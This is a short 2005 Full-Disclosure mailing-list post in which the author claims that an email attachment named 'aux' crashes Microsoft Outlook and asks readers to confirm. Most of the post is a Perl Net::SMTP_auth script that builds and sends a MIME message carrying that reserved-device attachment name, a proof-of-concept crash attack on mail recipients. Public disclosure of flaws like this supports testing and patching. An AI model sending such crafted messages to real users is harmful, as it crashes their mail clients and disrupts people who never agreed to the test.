[Full-disclosure] hehelol

From: kcope (kingcope_at_gmx.net)
Date: 07/15/05

  • Next message: SPI Labs: "[Full-disclosure] Stack-Based Buffer Overflow in Sybase EAServer 4.2.5 to 5.2"
    Date: Fri, 15 Jul 2005 20:16:47 +0200
    To: full-disclosure@lists.grok.org.uk
    
    

    hello, this is kcope and im bored .. soo

    sending an email with an attachment named aux to a Microsoft Outlook
    client crashes Outlook, can someone confirm that?

    heres some code to test that

    -----snip----------
    use Net::SMTP_auth;
        $smtp = Net::SMTP_auth->new('mail.gmx.net');
        $smtp->auth('CRAM-MD5', 'username', 'password'); # for smtp
    authentication

        $smtp->mail("kingcope\@gmx.net");
        $smtp->to("kingcope\@gmx.net");

    $a="aux";
       
        $msg = "Subject: a
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
     boundary= \"KkK170891tpbkKk__FV_KKKkkkjjwq\"

    --KkK170891tpbkKk__FV_KKKkkkjjwq
    Content-Type: text/html; charset=US-ASCII

    here goes the text message

    --KkK170891tpbkKk__FV_KKKkkkjjwq
    Content-Type: text/html
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment;
     filename= \"".$a."\"

    $x
    --KkK170891tpbkKk__FV_KKKkkkjjwq--

    ";
       
        $smtp->data();
        $smtp->datasend("To: kingcope\@gmx.net\n");
        $smtp->datasend("$msg\n");
        $smtp->datasend("pwned\n");
        $smtp->dataend();

        $smtp->quit;
    -----snip------------

    -kcope

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: SPI Labs: "[Full-disclosure] Stack-Based Buffer Overflow in Sybase EAServer 4.2.5 to 5.2"